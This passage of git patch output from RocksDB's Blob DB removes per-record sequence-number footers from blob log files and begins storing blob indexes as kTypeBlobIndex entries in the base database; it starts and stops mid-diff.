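//   Status s = updates->Iterate(&blob_inserter);  // aborts on first failure
//   if (s.ok()) s = db_->Write(opts, blob_inserter.updates_blob());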
SequenceNumber sn = WriteBatchInternal::Sequence(&batch); - - if (debug_level_ >= 3) - ROCKS_LOG_INFO(db_options_.info_log, "PathName().c_str(), key.ToString().c_str(), sn); - - s = AppendSN(bfile, sn); - if (!s.ok()) { - ROCKS_LOG_ERROR(db_options_.info_log, - "Failed to append SN to FILE: %s: KEY: %s VALSZ: %d" - " status: '%s' blob_file: '%s'", - bfile->PathName().c_str(), key.ToString().c_str(), - value.size(), s.ToString().c_str(), - bfile->DumpState().c_str()); - } + bfile->ExtendSequenceRange(sn); if (expiration != kNoExpiration) { extendTTL(&(bfile->ttl_range_), expiration); @@ -1140,32 +1105,6 @@ Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, return s; } -Status BlobDBImpl::AppendSN(const std::shared_ptr& bfile, - const SequenceNumber& sn) { - Status s; - { - WriteLock lockbfile_w(&bfile->mutex_); - std::shared_ptr writer = CheckOrCreateWriterLocked(bfile); - if (!writer) return Status::IOError("Failed to create blob writer"); - - s = writer->AddRecordFooter(sn); - if (!s.ok()) { - ROCKS_LOG_ERROR(db_options_.info_log, - "Invalid status in AppendSN: %s status: '%s'", - bfile->PathName().c_str(), s.ToString().c_str()); - return s; - } - - if (sn != std::numeric_limits::max()) - extendSN(&(bfile->sn_range_), sn); - } - - bfile->file_size_ += BlobLogRecord::kFooterSize; - last_period_write_ += BlobLogRecord::kFooterSize; - total_blob_space_ += BlobLogRecord::kFooterSize; - return s; -} - std::vector BlobDBImpl::MultiGet( const ReadOptions& read_options, const std::vector& keys, std::vector* values) { @@ -1205,7 +1144,8 @@ bool BlobDBImpl::SetSnapshotIfNeeded(ReadOptions* read_options) { } Status BlobDBImpl::CommonGet(const Slice& key, const std::string& index_entry, - std::string* value, SequenceNumber* sequence) { + std::string* value) { + assert(value != nullptr); Slice index_entry_slice(index_entry); BlobHandle handle; Status s = handle.DecodeFrom(&index_entry_slice); @@ -1249,90 +1189,69 @@ Status BlobDBImpl::CommonGet(const Slice& key, const std::string& index_entry, std::shared_ptr reader = GetOrOpenRandomAccessReader(bfile, env_, env_options_); - if (value != nullptr) { - std::string* valueptr = value; - std::string value_c; - if (bdb_options_.compression != kNoCompression) { - valueptr = &value_c; - } + std::string* valueptr = value; + std::string value_c; + if (bdb_options_.compression != kNoCompression) { + valueptr = &value_c; + } - // allocate the buffer. This is safe in C++11 - valueptr->resize(handle.size()); - char* buffer = &(*valueptr)[0]; - - Slice blob_value; - s = reader->Read(handle.offset(), handle.size(), &blob_value, buffer); - if (!s.ok() || blob_value.size() != handle.size()) { - if (debug_level_ >= 2) { - ROCKS_LOG_ERROR( - db_options_.info_log, - "Failed to read blob from file: %s blob_offset: %" PRIu64 - " blob_size: %" PRIu64 " read: %d key: %s status: '%s'", - bfile->PathName().c_str(), handle.offset(), handle.size(), - static_cast(blob_value.size()), key.data(), - s.ToString().c_str()); - } - return Status::NotFound("Blob Not Found as couldnt retrieve Blob"); - } + // allocate the buffer. 
This is safe in C++11 + valueptr->resize(handle.size()); + char* buffer = &(*valueptr)[0]; - Slice crc_slice; - uint32_t crc_exp; - std::string crc_str; - crc_str.resize(sizeof(uint32_t)); - char* crc_buffer = &(crc_str[0]); - s = reader->Read(handle.offset() - (key.size() + sizeof(uint32_t)), - sizeof(uint32_t), &crc_slice, crc_buffer); - if (!s.ok() || !GetFixed32(&crc_slice, &crc_exp)) { - if (debug_level_ >= 2) { - ROCKS_LOG_ERROR( - db_options_.info_log, - "Failed to fetch blob crc file: %s blob_offset: %" PRIu64 - " blob_size: %" PRIu64 " key: %s status: '%s'", - bfile->PathName().c_str(), handle.offset(), handle.size(), - key.data(), s.ToString().c_str()); - } - return Status::NotFound("Blob Not Found as couldnt retrieve CRC"); + Slice blob_value; + s = reader->Read(handle.offset(), handle.size(), &blob_value, buffer); + if (!s.ok() || blob_value.size() != handle.size()) { + if (debug_level_ >= 2) { + ROCKS_LOG_ERROR(db_options_.info_log, + "Failed to read blob from file: %s blob_offset: %" PRIu64 + " blob_size: %" PRIu64 " read: %d key: %s status: '%s'", + bfile->PathName().c_str(), handle.offset(), handle.size(), + static_cast(blob_value.size()), key.data(), + s.ToString().c_str()); } + return Status::NotFound("Blob Not Found as couldnt retrieve Blob"); + } - uint32_t crc = crc32c::Extend(0, blob_value.data(), blob_value.size()); - crc = crc32c::Mask(crc); // Adjust for storage - if (crc != crc_exp) { - if (debug_level_ >= 2) { - ROCKS_LOG_ERROR(db_options_.info_log, - "Blob crc mismatch file: %s blob_offset: %" PRIu64 - " blob_size: %" PRIu64 " key: %s status: '%s'", - bfile->PathName().c_str(), handle.offset(), - handle.size(), key.data(), s.ToString().c_str()); - } - return Status::Corruption("Corruption. Blob CRC mismatch"); + Slice crc_slice; + uint32_t crc_exp; + std::string crc_str; + crc_str.resize(sizeof(uint32_t)); + char* crc_buffer = &(crc_str[0]); + s = reader->Read(handle.offset() - (key.size() + sizeof(uint32_t)), + sizeof(uint32_t), &crc_slice, crc_buffer); + if (!s.ok() || !GetFixed32(&crc_slice, &crc_exp)) { + if (debug_level_ >= 2) { + ROCKS_LOG_ERROR(db_options_.info_log, + "Failed to fetch blob crc file: %s blob_offset: %" PRIu64 + " blob_size: %" PRIu64 " key: %s status: '%s'", + bfile->PathName().c_str(), handle.offset(), handle.size(), + key.data(), s.ToString().c_str()); } + return Status::NotFound("Blob Not Found as couldnt retrieve CRC"); + } - if (bdb_options_.compression != kNoCompression) { - BlockContents contents; - auto cfh = - reinterpret_cast(DefaultColumnFamily()); - s = UncompressBlockContentsForCompressionType( - blob_value.data(), blob_value.size(), &contents, - kBlockBasedTableVersionFormat, Slice(), bdb_options_.compression, - *(cfh->cfd()->ioptions())); - *value = contents.data.ToString(); + uint32_t crc = crc32c::Extend(0, blob_value.data(), blob_value.size()); + crc = crc32c::Mask(crc); // Adjust for storage + if (crc != crc_exp) { + if (debug_level_ >= 2) { + ROCKS_LOG_ERROR(db_options_.info_log, + "Blob crc mismatch file: %s blob_offset: %" PRIu64 + " blob_size: %" PRIu64 " key: %s status: '%s'", + bfile->PathName().c_str(), handle.offset(), handle.size(), + key.data(), s.ToString().c_str()); } + return Status::Corruption("Corruption. 
Blob CRC mismatch"); } - if (sequence != nullptr) { - char buffer[BlobLogRecord::kFooterSize]; - Slice footer_slice; - s = reader->Read(handle.offset() + handle.size(), - BlobLogRecord::kFooterSize, &footer_slice, buffer); - if (!s.ok()) { - return s; - } - BlobLogRecord record; - s = record.DecodeFooterFrom(footer_slice); - if (!s.ok()) { - return s; - } - *sequence = record.GetSN(); + if (bdb_options_.compression != kNoCompression) { + BlockContents contents; + auto cfh = reinterpret_cast(DefaultColumnFamily()); + s = UncompressBlockContentsForCompressionType( + blob_value.data(), blob_value.size(), &contents, + kBlockBasedTableVersionFormat, Slice(), bdb_options_.compression, + *(cfh->cfd()->ioptions())); + *value = contents.data.ToString(); } return s; @@ -1488,8 +1407,7 @@ bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, WriteLock lockbfile_w(&bfile->mutex_); bfile->deleted_count_++; - bfile->deleted_size_ += key_size + blob_size + BlobLogRecord::kHeaderSize + - BlobLogRecord::kFooterSize; + bfile->deleted_size_ += key_size + blob_size + BlobLogRecord::kHeaderSize; return true; } @@ -1742,7 +1660,7 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, bool has_ttl = header.HasTTL(); // this reads the key but skips the blob - Reader::ReadLevel shallow = Reader::kReadHdrKeyFooter; + Reader::ReadLevel shallow = Reader::kReadHeaderKey; assert(opt_db_); @@ -1759,7 +1677,7 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, bool no_relocation = no_relocation_ttl || no_relocation_lsmdel; if (!no_relocation) { // read the blob because you have to write it back to new file - shallow = Reader::kReadHdrKeyBlobFooter; + shallow = Reader::kReadHeaderKeyBlob; } BlobLogRecord record; @@ -1906,10 +1824,9 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, new_handle.set_compression(bdb_options_.compression); new_handle.EncodeTo(&new_index_entry); - new_writer->AddRecordFooter(record.GetSN()); newfile->blob_count_++; - newfile->file_size_ += BlobLogRecord::kHeaderSize + record.Key().size() + - record.Blob().size() + BlobLogRecord::kFooterSize; + newfile->file_size_ += + BlobLogRecord::kHeaderSize + record.Key().size() + record.Blob().size(); TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"); transaction->Put(cfh, record.Key(), new_index_entry); @@ -2105,7 +2022,7 @@ bool BlobDBImpl::CallbackEvictsImpl(std::shared_ptr bfile) { ColumnFamilyHandle* cfh = bfile->GetColumnFamily(db_); BlobLogRecord record; - Reader::ReadLevel full = Reader::kReadHdrKeyBlobFooter; + Reader::ReadLevel full = Reader::kReadHeaderKeyBlob; while (reader->ReadRecord(&record, full).ok()) { bdb_options_.gc_evict_cb_fn(cfh, record.Key(), record.Blob()); } @@ -2320,16 +2237,6 @@ Status DestroyBlobDB(const std::string& dbname, const Options& options, } #ifndef NDEBUG -Status BlobDBImpl::TEST_GetSequenceNumber(const Slice& key, - SequenceNumber* sequence) { - std::string index_entry; - Status s = db_->Get(ReadOptions(), key, &index_entry); - if (!s.ok()) { - return s; - } - return CommonGet(key, index_entry, nullptr, sequence); -} - std::vector> BlobDBImpl::TEST_GetBlobFiles() const { ReadLock l(&mutex_); std::vector> blob_files; diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 6cb0d30a220..5654d05e569 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -252,8 +252,6 @@ class BlobDBImpl : public BlobDB { ~BlobDBImpl(); #ifndef NDEBUG - Status 
TEST_GetSequenceNumber(const Slice& key, SequenceNumber* sequence); - std::vector> TEST_GetBlobFiles() const; std::vector> TEST_GetObsoleteFiles() const; @@ -278,7 +276,7 @@ class BlobDBImpl : public BlobDB { bool SetSnapshotIfNeeded(ReadOptions* read_options); Status CommonGet(const Slice& key, const std::string& index_entry, - std::string* value, SequenceNumber* sequence = nullptr); + std::string* value); Slice GetCompressedSlice(const Slice& raw, std::string* compression_output) const; @@ -310,9 +308,6 @@ class BlobDBImpl : public BlobDB { const std::string& headerbuf, const Slice& key, const Slice& value, std::string* index_entry); - Status AppendSN(const std::shared_ptr& bfile, - const SequenceNumber& sn); - // find an existing blob log file based on the expiration unix epoch // if such a file does not exist, return nullptr std::shared_ptr SelectBlobFileTTL(uint64_t expiration); diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 9d0214effb7..5c15041e2da 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -530,43 +530,6 @@ TEST_F(BlobDBTest, MultipleWriters) { VerifyDB(data); } -// Test sequence number store in blob file is correct. -TEST_F(BlobDBTest, SequenceNumber) { - Random rnd(301); - BlobDBOptions bdb_options; - bdb_options.disable_background_tasks = true; - Open(bdb_options); - SequenceNumber sequence = blob_db_->GetLatestSequenceNumber(); - BlobDBImpl *blob_db_impl = - static_cast_with_check(blob_db_); - for (int i = 0; i < 100; i++) { - std::string key = "key" + ToString(i); - PutRandom(key, &rnd); - sequence += 1; - ASSERT_EQ(sequence, blob_db_->GetLatestSequenceNumber()); - SequenceNumber actual_sequence = 0; - ASSERT_OK(blob_db_impl->TEST_GetSequenceNumber(key, &actual_sequence)); - ASSERT_EQ(sequence, actual_sequence); - } - for (int i = 0; i < 100; i++) { - WriteBatch batch; - size_t batch_size = rnd.Next() % 10 + 1; - for (size_t k = 0; k < batch_size; k++) { - std::string value = test::RandomHumanReadableString(&rnd, 1000); - ASSERT_OK(batch.Put("key" + ToString(i) + "-" + ToString(k), value)); - } - ASSERT_OK(blob_db_->Write(WriteOptions(), &batch)); - for (size_t k = 0; k < batch_size; k++) { - std::string key = "key" + ToString(i) + "-" + ToString(k); - sequence++; - SequenceNumber actual_sequence; - ASSERT_OK(blob_db_impl->TEST_GetSequenceNumber(key, &actual_sequence)); - ASSERT_EQ(sequence, actual_sequence); - } - ASSERT_EQ(sequence, blob_db_->GetLatestSequenceNumber()); - } -} - TEST_F(BlobDBTest, GCAfterOverwriteKeys) { Random rnd(301); BlobDBOptions bdb_options; diff --git a/utilities/blob_db/blob_dump_tool.cc b/utilities/blob_db/blob_dump_tool.cc index c9db7e8fa67..e9b7351bb23 100644 --- a/utilities/blob_db/blob_dump_tool.cc +++ b/utilities/blob_db/blob_dump_tool.cc @@ -185,7 +185,7 @@ Status BlobDumpTool::DumpRecord(DisplayType show_key, DisplayType show_blob, uint32_t header_crc = crc32c::Extend(0, slice.data(), slice.size() - 2 * sizeof(uint32_t)); *offset += BlobLogRecord::kHeaderSize; - s = Read(*offset, key_size + blob_size + BlobLogRecord::kFooterSize, &slice); + s = Read(*offset, key_size + blob_size, &slice); if (!s.ok()) { return s; } @@ -207,15 +207,7 @@ Status BlobDumpTool::DumpRecord(DisplayType show_key, DisplayType show_blob, DumpSlice(Slice(slice.data() + key_size, blob_size), show_blob); } } - Slice footer_slice(slice.data() + record.GetKeySize() + record.GetBlobSize(), - BlobLogRecord::kFooterSize); - s = record.DecodeFooterFrom(footer_slice); - if (!s.ok()) { - 
return s; - } - fprintf(stdout, " footer CRC : %" PRIu32 "\n", record.footer_checksum()); - fprintf(stdout, " sequence : %" PRIu64 "\n", record.GetSN()); - *offset += key_size + blob_size + BlobLogRecord::kFooterSize; + *offset += key_size + blob_size; return s; } diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc index dd98ed9d120..b247a69f33d 100644 --- a/utilities/blob_db/blob_file.cc +++ b/utilities/blob_db/blob_file.cc @@ -5,8 +5,14 @@ #ifndef ROCKSDB_LITE #include "utilities/blob_db/blob_file.h" +#ifndef __STDC_FORMAT_MACROS +#define __STDC_FORMAT_MACROS +#endif + +#include #include -#include + +#include #include #include "util/filename.h" diff --git a/utilities/blob_db/blob_file.h b/utilities/blob_db/blob_file.h index d648ddee412..a18bf778abe 100644 --- a/utilities/blob_db/blob_file.h +++ b/utilities/blob_db/blob_file.h @@ -147,6 +147,11 @@ class BlobFile { return header_.HasTimestamp(); } + void ExtendSequenceRange(SequenceNumber sequence) { + sn_range_.first = std::min(sn_range_.first, sequence); + sn_range_.second = std::max(sn_range_.second, sequence); + } + std::shared_ptr GetWriter() const { return log_writer_; } void Fsync(); diff --git a/utilities/blob_db/blob_log_format.cc b/utilities/blob_db/blob_log_format.cc index b5c8fe56e8b..2e6fa3c63c9 100644 --- a/utilities/blob_db/blob_log_format.cc +++ b/utilities/blob_db/blob_log_format.cc @@ -224,7 +224,6 @@ BlobLogRecord::BlobLogRecord() blob_size_(0), time_val_(0), ttl_val_(0), - sn_(0), type_(0), subtype_(0) {} @@ -249,7 +248,6 @@ void BlobLogRecord::Clear() { blob_size_ = 0; time_val_ = 0; ttl_val_ = 0; - sn_ = 0; type_ = subtype_ = 0; key_.clear(); blob_.clear(); @@ -289,30 +287,6 @@ Status BlobLogRecord::DecodeHeaderFrom(const Slice& hdrslice) { return Status::OK(); } -Status BlobLogRecord::DecodeFooterFrom(const Slice& footerslice) { - Slice input = footerslice; - if (input.size() < kFooterSize) { - return Status::Corruption("Invalid Blob Record Footer: size"); - } - - uint32_t f_crc = crc32c::Extend(0, input.data(), 8); - f_crc = crc32c::Mask(f_crc); - - if (!GetFixed64(&input, &sn_)) { - return Status::Corruption("Invalid Blob Record Footer: sn"); - } - - if (!GetFixed32(&input, &footer_cksum_)) { - return Status::Corruption("Invalid Blob Record Footer: cksum"); - } - - if (f_crc != footer_cksum_) { - return Status::Corruption("Record Checksum mismatch: footer_cksum"); - } - - return Status::OK(); -} - } // namespace blob_db } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/blob_db/blob_log_format.h b/utilities/blob_db/blob_log_format.h index 5a22390b271..c5b96d1b07a 100644 --- a/utilities/blob_db/blob_log_format.h +++ b/utilities/blob_db/blob_log_format.h @@ -188,8 +188,6 @@ class BlobLogRecord { uint64_t blob_size_; uint64_t time_val_; uint64_t ttl_val_; - SequenceNumber sn_; - uint32_t footer_cksum_; char type_; char subtype_; Slice key_; @@ -218,8 +216,6 @@ class BlobLogRecord { // = 42 static const size_t kHeaderSize = 4 + 4 + 8 + 8 + 4 + 8 + 1 + 1; - static const size_t kFooterSize = 8 + 4; - public: BlobLogRecord(); @@ -245,17 +241,11 @@ class BlobLogRecord { char subtype() const { return subtype_; } - SequenceNumber GetSN() const { return sn_; } - uint32_t header_checksum() const { return header_cksum_; } uint32_t checksum() const { return checksum_; } - uint32_t footer_checksum() const { return footer_cksum_; } - Status DecodeHeaderFrom(const Slice& hdrslice); - - Status DecodeFooterFrom(const Slice& footerslice); }; } // namespace blob_db diff --git 
a/utilities/blob_db/blob_log_reader.cc b/utilities/blob_db/blob_log_reader.cc index 75afab2e743..826551d686e 100644 --- a/utilities/blob_db/blob_log_reader.cc +++ b/utilities/blob_db/blob_log_reader.cc @@ -69,21 +69,11 @@ Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, *blob_offset = next_byte_ + record->GetKeySize(); } switch (level) { - case kReadHdrFooter: + case kReadHeader: file_->Skip(kb_size); next_byte_ += kb_size; - status = - file_->Read(BlobLogRecord::kFooterSize, &buffer_, GetReadBuffer()); - next_byte_ += buffer_.size(); - if (!status.ok()) return status; - if (buffer_.size() != BlobLogRecord::kFooterSize) { - return Status::IOError("EOF reached before record footer"); - } - - status = record->DecodeFooterFrom(buffer_); - return status; - case kReadHdrKeyFooter: + case kReadHeaderKey: record->ResizeKeyBuffer(record->GetKeySize()); status = file_->Read(record->GetKeySize(), &record->key_, record->GetKeyBuffer()); @@ -103,18 +93,7 @@ Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, file_->Skip(record->GetBlobSize()); next_byte_ += record->GetBlobSize(); - status = - file_->Read(BlobLogRecord::kFooterSize, &buffer_, GetReadBuffer()); - next_byte_ += buffer_.size(); - if (!status.ok()) return status; - if (buffer_.size() != BlobLogRecord::kFooterSize) { - return Status::IOError("EOF reached during footer read"); - } - - status = record->DecodeFooterFrom(buffer_); - return status; - - case kReadHdrKeyBlobFooter: + case kReadHeaderKeyBlob: record->ResizeKeyBuffer(record->GetKeySize()); status = file_->Read(record->GetKeySize(), &record->key_, record->GetKeyBuffer()); @@ -146,21 +125,8 @@ Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, if (blob_crc != record->checksum_) { return Status::Corruption("Blob Checksum mismatch"); } - - status = - file_->Read(BlobLogRecord::kFooterSize, &buffer_, GetReadBuffer()); - next_byte_ += buffer_.size(); - if (!status.ok()) return status; - if (buffer_.size() != BlobLogRecord::kFooterSize) { - return Status::IOError("EOF reached during blob footer read"); - } - - status = record->DecodeFooterFrom(buffer_); - return status; - default: - assert(0); - return status; } + return status; } } // namespace blob_db diff --git a/utilities/blob_db/blob_log_reader.h b/utilities/blob_db/blob_log_reader.h index 5522ec3a28b..d37e10bc4e4 100644 --- a/utilities/blob_db/blob_log_reader.h +++ b/utilities/blob_db/blob_log_reader.h @@ -32,9 +32,9 @@ namespace blob_db { class Reader { public: enum ReadLevel { - kReadHdrFooter, - kReadHdrKeyFooter, - kReadHdrKeyBlobFooter, + kReadHeader, + kReadHeaderKey, + kReadHeaderKeyBlob, }; // Create a reader that will return log records from "*file". @@ -61,7 +61,7 @@ class Reader { // will only be valid until the next mutating operation on this // reader or the next mutation to *scratch. // If blob_offset is non-null, return offset of the blob through it. 
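// [Editor's note, illustrative] After the rename, the three levels say how
// much of a record ReadRecord materializes, now that there is no per-record
// footer to decode:
//
//   Reader::kReadHeader         // header only; key and blob are skipped
//   Reader::kReadHeaderKey      // header + key; blob skipped (GC key check)
//   Reader::kReadHeaderKeyBlob  // full record (GC relocation, evict callback)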
- Status ReadRecord(BlobLogRecord* record, ReadLevel level = kReadHdrFooter, + Status ReadRecord(BlobLogRecord* record, ReadLevel level = kReadHeader, uint64_t* blob_offset = nullptr); SequentialFileReader* file() { return file_.get(); } diff --git a/utilities/blob_db/blob_log_writer.cc b/utilities/blob_db/blob_log_writer.cc index 0a049b75c69..f4fcaeb90f9 100644 --- a/utilities/blob_db/blob_log_writer.cc +++ b/utilities/blob_db/blob_log_writer.cc @@ -2,7 +2,6 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). -// #ifndef ROCKSDB_LITE #include "utilities/blob_db/blob_log_writer.h" @@ -53,7 +52,7 @@ Status Writer::WriteHeader(const BlobLogHeader& header) { Status Writer::AppendFooter(const BlobLogFooter& footer) { assert(block_offset_ != 0); - assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtFooter); + assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord); std::string str; footer.EncodeTo(&str); @@ -73,7 +72,7 @@ Status Writer::AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset, uint64_t* blob_offset, uint64_t ttl) { assert(block_offset_ != 0); - assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtFooter); + assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord); std::string buf; ConstructBlobHeader(&buf, key, val, ttl, -1); @@ -85,7 +84,7 @@ Status Writer::AddRecord(const Slice& key, const Slice& val, Status Writer::AddRecord(const Slice& key, const Slice& val, uint64_t* key_offset, uint64_t* blob_offset) { assert(block_offset_ != 0); - assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtFooter); + assert(last_elem_type_ == kEtFileHdr || last_elem_type_ == kEtRecord); std::string buf; ConstructBlobHeader(&buf, key, val, -1, -1); @@ -134,7 +133,12 @@ Status Writer::EmitPhysicalRecord(const std::string& headerbuf, Status s = dest_->Append(Slice(headerbuf)); if (s.ok()) { s = dest_->Append(key); - if (s.ok()) s = dest_->Append(val); + } + if (s.ok()) { + s = dest_->Append(val); + } + if (s.ok()) { + s = dest_->Flush(); } *key_offset = block_offset_ + BlobLogRecord::kHeaderSize; @@ -144,25 +148,6 @@ Status Writer::EmitPhysicalRecord(const std::string& headerbuf, return s; } -Status Writer::AddRecordFooter(const SequenceNumber& seq) { - assert(last_elem_type_ == kEtRecord); - - std::string buf; - PutFixed64(&buf, seq); - - uint32_t footer_crc = crc32c::Extend(0, buf.c_str(), buf.size()); - footer_crc = crc32c::Mask(footer_crc); - PutFixed32(&buf, footer_crc); - - Status s = dest_->Append(Slice(buf)); - block_offset_ += BlobLogRecord::kFooterSize; - - if (s.ok()) dest_->Flush(); - - last_elem_type_ = kEtFooter; - return s; -} - } // namespace blob_db } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/blob_db/blob_log_writer.h b/utilities/blob_db/blob_log_writer.h index a3c176ecbfe..d674351588b 100644 --- a/utilities/blob_db/blob_log_writer.h +++ b/utilities/blob_db/blob_log_writer.h @@ -2,7 +2,6 @@ // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). 
-// #pragma once #ifndef ROCKSDB_LITE @@ -53,8 +52,6 @@ class Writer { const Slice& val, uint64_t* key_offset, uint64_t* blob_offset); - Status AddRecordFooter(const SequenceNumber& sn); - Status AppendFooter(const BlobLogFooter& footer); Status WriteHeader(const BlobLogHeader& header); @@ -89,7 +86,7 @@ class Writer { Writer& operator=(const Writer&) = delete; public: - enum ElemType { kEtNone, kEtFileHdr, kEtRecord, kEtFooter, kEtFileFooter }; + enum ElemType { kEtNone, kEtFileHdr, kEtRecord, kEtFileFooter }; ElemType last_elem_type_; }; From 2b8893b9e4224a9a3edb00e2dea2451199e50048 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 17 Oct 2017 17:24:25 -0700 Subject: [PATCH 176/205] Blob DB: Store blob index as kTypeBlobIndex in base db Summary: Blob DB now inserts the blob index into the base DB as kTypeBlobIndex records, to tell apart values written by plain RocksDB from those written by Blob DB. This makes it possible to migrate an existing RocksDB instance to Blob DB. With this patch, Blob DB garbage collection also moves away from OptimisticTransaction; instead it uses a custom write callback to achieve similar behavior. This is because we need to pass the is_blob_index flag to DBImpl::Get, which OptimisticTransaction doesn't support. Closes https://github.com/facebook/rocksdb/pull/3000 Differential Revision: D6050044 Pulled By: yiwu-arbug fbshipit-source-id: 61dc72ab9977625e75f78cd968e7d8a3976e3632 --- db/db_impl.cc | 11 +- db/db_impl.h | 16 +- db/memtable_list.cc | 12 +- db/memtable_list.h | 8 +- utilities/blob_db/blob_db_impl.cc | 306 +++++++++++++++------------ utilities/blob_db/blob_db_impl.h | 71 ++----- utilities/blob_db/blob_db_iterator.h | 104 +++++++++ utilities/blob_db/blob_db_test.cc | 89 ++++++-- 8 files changed, 376 insertions(+), 241 deletions(-) create mode 100644 utilities/blob_db/blob_db_iterator.h diff --git a/db/db_impl.cc b/db/db_impl.cc index 688bc51fad8..8e9754320a7 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -2528,7 +2528,8 @@ SequenceNumber DBImpl::GetEarliestMemTableSequenceNumber(SuperVersion* sv, #ifndef ROCKSDB_LITE Status DBImpl::GetLatestSequenceForKey(SuperVersion* sv, const Slice& key, bool cache_only, SequenceNumber* seq, - bool* found_record_for_key) { + bool* found_record_for_key, + bool* is_blob_index) { Status s; MergeContext merge_context; RangeDelAggregator range_del_agg(sv->mem->GetInternalKeyComparator(), @@ -2543,7 +2544,7 @@ Status DBImpl::GetLatestSequenceForKey(SuperVersion* sv, const Slice& key, // Check if there is a record for this key in the latest memtable sv->mem->Get(lkey, nullptr, &s, &merge_context, &range_del_agg, seq, - read_options); + read_options, is_blob_index); if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) { // unexpected error reading memtable. @@ -2562,7 +2563,7 @@ Status DBImpl::GetLatestSequenceForKey(SuperVersion* sv, const Slice& key, // Check if there is a record for this key in the immutable memtables sv->imm->Get(lkey, nullptr, &s, &merge_context, &range_del_agg, seq, - read_options); + read_options, is_blob_index); if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) { // unexpected error reading memtable. @@ -2581,7 +2582,7 @@ Status DBImpl::GetLatestSequenceForKey(SuperVersion* sv, const Slice& key, // Check if there is a record for this key in the immutable memtables sv->imm->GetFromHistory(lkey, nullptr, &s, &merge_context, &range_del_agg, - seq, read_options); + seq, read_options, is_blob_index); if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) { // unexpected error reading memtable.
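// [Editor's sketch, not from the patch] The new out-parameter threads through
// every probe (active memtable, immutable memtables, history, SSTs), so a
// caller can learn both the latest sequence for a key and whether that
// version is a blob index:
//
//   SequenceNumber latest_seq = 0;
//   bool found_record = false;
//   bool is_blob_index = false;
//   Status s = db_impl->GetLatestSequenceForKey(
//       sv, key, false /*cache_only*/, &latest_seq, &found_record,
//       &is_blob_index);
//
// Blob DB's GarbageCollectionWriteCallback (further down) relies on exactly
// this triple to detect concurrent overwrites.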
@@ -2605,7 +2606,7 @@ Status DBImpl::GetLatestSequenceForKey(SuperVersion* sv, const Slice& key, // Check tables sv->current->Get(read_options, lkey, nullptr, &s, &merge_context, &range_del_agg, nullptr /* value_found */, - found_record_for_key, seq); + found_record_for_key, seq, is_blob_index); if (!(s.ok() || s.IsNotFound() || s.IsMergeInProgress())) { // unexpected error reading SST files diff --git a/db/db_impl.h b/db/db_impl.h index 76b52b8b83f..230f614b4f4 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -94,6 +94,13 @@ class DBImpl : public DB { virtual Status Get(const ReadOptions& options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value) override; + + // Function that Get and KeyMayExist call with no_io true or false + // Note: 'value_found' from KeyMayExist propagates here + Status GetImpl(const ReadOptions& options, ColumnFamilyHandle* column_family, + const Slice& key, PinnableSlice* value, + bool* value_found = nullptr, bool* is_blob_index = nullptr); + using DB::MultiGet; virtual std::vector MultiGet( const ReadOptions& options, @@ -292,7 +299,8 @@ class DBImpl : public DB { // TODO(andrewkr): this API need to be aware of range deletion operations Status GetLatestSequenceForKey(SuperVersion* sv, const Slice& key, bool cache_only, SequenceNumber* seq, - bool* found_record_for_key); + bool* found_record_for_key, + bool* is_blob_index = nullptr); using DB::IngestExternalFile; virtual Status IngestExternalFile( @@ -1252,12 +1260,6 @@ class DBImpl : public DB { #endif // ROCKSDB_LITE - // Function that Get and KeyMayExist call with no_io true or false - // Note: 'value_found' from KeyMayExist propagates here - Status GetImpl(const ReadOptions& options, ColumnFamilyHandle* column_family, - const Slice& key, PinnableSlice* value, - bool* value_found = nullptr, bool* is_blob_index = nullptr); - bool GetIntPropertyInternal(ColumnFamilyData* cfd, const DBPropertyInfo& property_info, bool is_locked, uint64_t* value); diff --git a/db/memtable_list.cc b/db/memtable_list.cc index a9d9e1c0226..5921a50b351 100644 --- a/db/memtable_list.cc +++ b/db/memtable_list.cc @@ -110,14 +110,12 @@ bool MemTableListVersion::Get(const LookupKey& key, std::string* value, seq, read_opts, is_blob_index); } -bool MemTableListVersion::GetFromHistory(const LookupKey& key, - std::string* value, Status* s, - MergeContext* merge_context, - RangeDelAggregator* range_del_agg, - SequenceNumber* seq, - const ReadOptions& read_opts) { +bool MemTableListVersion::GetFromHistory( + const LookupKey& key, std::string* value, Status* s, + MergeContext* merge_context, RangeDelAggregator* range_del_agg, + SequenceNumber* seq, const ReadOptions& read_opts, bool* is_blob_index) { return GetFromList(&memlist_history_, key, value, s, merge_context, - 